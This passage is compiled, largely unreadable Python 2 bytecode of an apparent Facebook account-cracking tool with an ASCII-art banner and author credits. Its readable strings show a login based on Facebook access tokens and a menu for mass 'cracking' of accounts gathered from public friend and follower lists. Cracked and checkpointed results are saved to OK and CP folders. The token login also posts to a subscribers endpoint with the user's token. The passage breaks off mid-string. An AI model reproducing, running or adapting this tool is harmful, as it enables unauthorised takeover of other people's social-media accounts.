1a\x00\x83\x00\x00\x01n\x01\x00Xe\x0f\x00j\x15\x00\x83\x00\x00Z\x1d\x00e\x1d\x00j\x1e\x00Z\x1f\x00e\x1d\x00j\x17\x00Z \x00e\x1d\x00j!\x00Z"\x00e\x19\x00e\x1b\x00\x19Z#\x00d\x17\x00\x84\x00\x00Z$\x00e\x10\x00j%\x00\x83\x00\x00Z&\x00e\n\x00j\'\x00e&\x00j(\x00\x83\x00\x00\x19Z)\x00d\x18\x00e)\x00e"\x00e#\x00e\x1f\x00f\x04\x00\x16Z*\x00d\x19\x00e"\x00e#\x00e\x1f\x00f\x03\x00\x16Z+\x00i\x0c\x00d\t\x00d\x1a\x006d\n\x00d\x1b\x006d\x0b\x00d\x1c\x006d\x0c\x00d\x1d\x006d\r\x00d\x1e\x006d\x0e\x00d\x1f\x006d\x0f\x00d \x006d\x10\x00d!\x006d\x11\x00d"\x006d\x12\x00d#\x006d\x13\x00d$\x006d\x14\x00d%\x006Z,\x00d&\x00\x84\x00\x00Z-\x00d\'\x00\x84\x00\x00Z.\x00d(\x00\x84\x00\x00Z/\x00d)\x00\x84\x00\x00Z0\x00d*\x00\x84\x00\x00Z1\x00d+\x00\x84\x00\x00Z2\x00d,\x00\x84\x00\x00Z3\x00d-\x00\x84\x00\x00Z4\x00d.\x00\x84\x00\x00Z5\x00d/\x00\x84\x00\x00Z6\x00d0\x00\x84\x00\x00Z7\x00d1\x00\x84\x00\x00Z8\x00d2\x00\x84\x00\x00Z9\x00d3\x00\x84\x00\x00Z:\x00e;\x00d4\x00k\x02\x00rA\x03e\x00\x00j\x03\x00d5\x00\x83\x01\x00\x01e\x00\x00j\x03\x00d6\x00\x83\x01\x00\x01e:\x00\x83\x00\x00\x01e.\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(7\x00\x00\x00i\xff\xff\xff\xffNs\x15\x00\x00\x00pip2 install requestss\x10\x00\x00\x00pip2 install bs4(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\r\x00\x00\x00BeautifulSoup(\x01\x00\x00\x00t\x08\x00\x00\x00datetime(\x01\x00\x00\x00t\x04\x00\x00\x00datei\x00\x00\x00\x00t\x07\x00\x00\x00Januarit\x08\x00\x00\x00Februarit\x05\x00\x00\x00Marett\x05\x00\x00\x00Aprilt\x03\x00\x00\x00Meit\x04\x00\x00\x00Junit\x04\x00\x00\x00Julit\x07\x00\x00\x00Agustust\t\x00\x00\x00Septembert\x07\x00\x00\x00Oktobert\x08\x00\x00\x00Novembert\x08\x00\x00\x00Desemberi\x0c\x00\x00\x00i\x01\x00\x00\x00c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xa9?(\x06\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00jalan1\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\x0b\x00\x00\x00%s-%s-%s-%ss\x08\x00\x00\x00%s %s %st\x02\x00\x00\x0001t\x02\x00\x00\x0002t\x02\x00\x00\x0003t\x02\x00\x00\x0004t\x02\x00\x00\x0005t\x02\x00\x00\x0006t\x02\x00\x00\x0007t\x02\x00\x00\x0008t\x02\x00\x00\x0009t\x02\x00\x00\x0010t\x02\x00\x00\x0011t\x02\x00\x00\x0012c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x00\x00S(\x03\x00\x00\x00Nt\x05\x00\x00\x00clears\xd4\t\x00\x00\x1b[1;97m \n \x1b[1;91m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;92mADMIN \xe2\x84\xa2 \x1b[1;91m \n \xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;96mC \x1b[1;91m \n \xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;93mG \x1b[1;91m \n \xe2\x94\x80\xe2\x96\x84\xe2\x96\x84\xe2\x94\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x84\xe2\x94\x80 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;91mA \x1b[1;91m \n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;97mI \x1b[1;91m \n \x1b[1;96m\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88 ==============\n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\xa6\xe2\x94\x80\xe2\x95\xa6\xe2\x95\x94\xe2\x95\x97\xe2\x95\xa6\xe2\x94\x80\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;92mCOMMUNITAS \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x94\x80\xe2\x95\x91\xe2\x94\x80\xe2\x95\x91\xe2\x94\x80\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa0\xe2\x94\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;93mGARANGAN \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\xa9\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d\xe2\x95\xa9\xe2\x94\x80\xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;91mALAY \x1b[1;96m \n \xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88 \xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;97mINDONESIA \x1b[1;96m \n \x1b[1;95m\xc2\xae\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x8f\xe2\x94\x93\n \xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x95\x8b\xe2\x94\x83\xe2\x94\x83\n \xe2\x94\x83\xe2\x94\x97\xe2\x94\x81\xe2\x94\x9b\xe2\x94\xa3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xab\xe2\x94\x83\xe2\x94\x8f\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xab\xe2\x94\x83\xe2\x95\x8b\xe2\x94\x83\xe2\x94\xa3\xe2\x94\x93\xe2\x94\x8f\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x81\xe2\x94\xb3\xe2\x94\x81\xe2\x94\x93\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x9b\xe2\x94\xa3\xe2\x94\x81\xe2\x94\x81\xe2\x94\x93 \n \x1b[1;92m\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x8f\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x97\xe2\x94\x81\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\n \xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x97\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\xab\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x81\xe2\x94\x93\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x83\xe2\x94\x97\xe2\x94\x9b\xe2\x94\x83\xe2\x94\x8f\xe2\x94\x93\xe2\x94\x83\n \xe2\x94\x97\xe2\x94\x9b\xe2\x94\x97\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x95\x8b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\xbb\xe2\x94\x81\xe2\x94\x81\xe2\x94\xbb\xe2\x94\x9b\xe2\x94\x97\xe2\x94\x9b \x1b[1;97m \n \n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Author : \x1b[1;92m\xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Github : \x1b[1;92mhttps://github.com/Bangsat-XD \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Facebook : \x1b[1;92mRaka Andrian Tara \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Instagram : \x1b[1;92mraka_andrian27 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Twitter : \x1b[1;92mBangsat_XD \x1b[1;97m\n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 (\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x19c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x16\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x11\x00t\x02\x00j\x03\x00d\x02\x00\x83\x01\x00\x01Wn!\x00\x04t\x02\x00j\x04\x00j\x05\x00k\n\x00rA\x00\x01\x01\x01t\x06\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x1a\x00t\x07\x00d\x04\x00d\x05\x00\x83\x02\x00}\x00\x00t\x08\x00\x83\x00\x00\x01Wn\xb3\x00\x04t\t\x00k\n\x00r\x11\x01\x01}\x01\x00\x01t\n\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00r\x8e\x00d\x08\x00GHn\x00\x00yU\x00t\x02\x00j\x03\x00d\t\x00|\x00\x00\x17\x83\x01\x00j\x0b\x00\x83\x00\x00d\n\x00\x19j\x0c\x00\x83\x00\x00}\x02\x00t\x07\x00d\x04\x00d\x0b\x00\x83\x02\x00j\r\x00|\x00\x00\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0c\x00|\x00\x00\x17\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01Wq\x12\x01\x04t\t\x00k\n\x00r\r\x01\x01\x01\x01t\x00\x00j\x01\x00d\r\x00\x83\x01\x00\x01t\x06\x00d\x0e\x00\x83\x01\x00\x01q\x12\x01Xn\x01\x00Xd\x00\x00S(\x0f\x00\x00\x00NR%\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.coms\x19\x00\x00\x00Internet Connection Errors\t\x00\x00\x00login.txtt\x01\x00\x00\x00rsB\x00\x00\x00[?] \xe2\x98\x86ENTER TOKEN\xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 : t\x00\x00\x00\x00s\x0b\x00\x00\x00Wrong Inputs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00ws6\x00\x00\x00https://graph.facebook.com/4/subscribers?access_token=s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] Login Error(\x0f\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionErrort\x04\x00\x00\x00exitt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\t\x00\x00\x00raw_inputt\x04\x00\x00\x00jsont\x05\x00\x00\x00lowerR\x12\x00\x00\x00t\x04\x00\x00\x00post(\x03\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00IOErrort\x04\x00\x00\x00nama(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginZ\x00\x00\x00s(\x00\x00\x00\x00\x01\r\x01\x03\x02\x11\x01\x13\x01\x0e\x01\x03\x01\x0f\x01\x0b\x01\x0f\x01\x0c\x01\x0c\x01\x08\x01\x03\x01#\x01\x16\x02\x11\x01\x0b\x01\r\x01\r\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xfe\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn(\x00\x04t\x05\x00k\n\x00rP\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x05\x00\x83\x01\x00\x01n\x01\x00Xy\'\x00t\x07\x00j\x08\x00d\x06\x00t\x04\x00\x17\x83\x01\x00j\t\x00\x83\x00\x00d\x07\x00\x19j\n\x00\x83\x00\x00}\x00\x00WnH\x00\x04t\x0b\x00k\n\x00r\xa2\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01n!\x00\x04t\x07\x00j\x0c\x00j\r\x00k\n\x00r\xc2\x00\x01\x01\x01t\x06\x00d\t\x00\x83\x01\x00\x01n\x01\x00Xt\x0e\x00\x83\x00\x00\x01d\n\x00GHd\x0b\x00|\x00\x00\x17d\x0c\x00\x17GHd\n\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHt\x0f\x00d\x13\x00\x83\x01\x00}\x01\x00|\x01\x00d\x14\x00k\x02\x00r!\x01t\x10\x00\x83\x00\x00\x01n\xd9\x02|\x01\x00d\x15\x00k\x02\x00s9\x01|\x01\x00d\x16\x00k\x02\x00rJ\x01t\x11\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00\x01n\xb0\x02|\x01\x00d\x17\x00k\x02\x00sb\x01|\x01\x00d\x18\x00k\x02\x00rs\x01t\x13\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00\x01n\x87\x02|\x01\x00d\x19\x00k\x02\x00s\x8b\x01|\x01\x00d\x1a\x00k\x02\x00r\x9c\x01t\x14\x00\x83\x00\x00\x01t\x12\x00\x83\x00\x00\x01n^\x02|\x01\x00d\x1b\x00k\x02\x00s\xb4\x01|\x01\x00d\x1c\x00k\x02\x00r\xfa\x03d\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd\x1d\x00GHt\x0f\x00d\x13\x00\x83\x01\x00}\x02\x00|\x02\x00d\x14\x00k\x02\x00r\xea\x01t\x10\x00\x83\x00\x00\x01n\x06\x02|\x02\x00d\x15\x00k\x02\x00r\xed\x02t\x00\x00j\x15\x00d \x00\x83\x01\x00}\x03\x00d!\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d"\x00|\x04\x00\x17GHq\x11\x02WyB\x00t\x0f\x00d#\x00\x83\x01\x00}\x04\x00|\x04\x00d\x14\x00k\x02\x00rI\x02t\x10\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d$\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x16\x00\x83\x00\x00}\x05\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x87\x02\x01\x01\x01t\x06\x00d%\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd&\x00|\x04\x00\x16j\x17\x00d\'\x00d\x1d\x00\x83\x02\x00}\x06\x00|\x06\x00j\x17\x00d(\x00d\x14\x00\x83\x02\x00}\x07\x00d)\x00GHd*\x00|\x07\x00t\x18\x00|\x05\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d+\x00|\x04\x00\x16\x83\x01\x00\x01d,\x00GHt\x06\x00d\x1d\x00\x83\x01\x00\x01n\x03\x01|\x02\x00d\x17\x00k\x02\x00r\xf0\x03t\x00\x00j\x15\x00d-\x00\x83\x01\x00}\x03\x00d.\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d/\x00|\x04\x00\x17GHq\x14\x03WyB\x00t\x0f\x00d0\x00\x83\x01\x00}\x04\x00|\x04\x00d\x14\x00k\x02\x00rL\x03t\x10\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d1\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x16\x00\x83\x00\x00}\x08\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x8a\x03\x01\x01\x01t\x06\x00d%\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd&\x00|\x04\x00\x16j\x17\x00d\'\x00d\x1d\x00\x83\x02\x00}\x06\x00|\x06\x00j\x17\x00d(\x00d\x14\x00\x83\x02\x00}\x07\x00d2\x00GHd3\x00|\x07\x00t\x18\x00|\x08\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d4\x00|\x04\x00\x16\x83\x01\x00\x01d5\x00GHt\x06\x00d\x1d\x00\x83\x01\x00\x01n\x00\x00t\x10\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(6\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] Login Errors,\x00\x00\x00https://graph.facebook.com/me/?access_token=R+\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Token Errors\x19\x00\x00\x00 ! no internet connections?\x00\x00\x00\x1b[1;92m<======================================================>s/\x00\x00\x00\x1b[1;96m<---------------- \x1b[1;95m[ HELLO \x1b[1;92ms(\x00\x00\x00\x1b[1;92m \x1b[1;95m] \x1b[1;96m--------------->sJ\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Clone from public friendssL\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Crack from public followerssk\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Multi cracking from public Id\x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sD\x00\x00\x00\x1b[1;96m[\x1b[1;93m4\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check crack resultssb\x00\x00\x00\x1b[1;96m[\x1b[1;93m5\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m User-agent settings \x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]s[\x00\x00\x00\x1b[1;96m[\x1b[1;93m6\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Exit\x1b[1;97m [ \x1b[1;91mRemove-Token \x1b[1;97m]s;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Option : R*\x00\x00\x00t\x01\x00\x00\x001R\x19\x00\x00\x00t\x01\x00\x00\x002R\x1a\x00\x00\x00t\x01\x00\x00\x003R\x1b\x00\x00\x00t\x01\x00\x00\x004R\x1c\x00\x00\x00t\x01\x00\x00\x00 sM\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check results RAKA_AMANDA OKsM\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80\x1b[1;97m Check results RAKA_AMANDA CPt\x02\x00\x00\x00OKs<\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy file name and past into inputs\x06\x00\x00\x00[\xc2\xae] s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] file name : s\x05\x00\x00\x00OK/%ss\x19\x00\x00\x00 ! file %s tidak tersedias\x02\x00\x00\x00%st\x01\x00\x00\x00-s\x04\x00\x00\x00.txts1\x00\x00\x00 # ----------------------------------------------s%\x00\x00\x00 Crack Resulte : %s Total : %s\x1b[0;92ms\t\x00\x00\x00cat OK/%ss9\x00\x00\x00 \x1b[0;94m # ----------------------------------------------t\x02\x00\x00\x00CPs;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy File Name And Past into Inputs\x03\x00\x00\x00 + s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] File Name : s\x05\x00\x00\x00CP/%ss0\x00\x00\x00# ----------------------------------------------s%\x00\x00\x00 Crack results : %s total : %s\x1b[0;93ms\t\x00\x00\x00cat CP/%ss8\x00\x00\x00\x1b[0;96m # 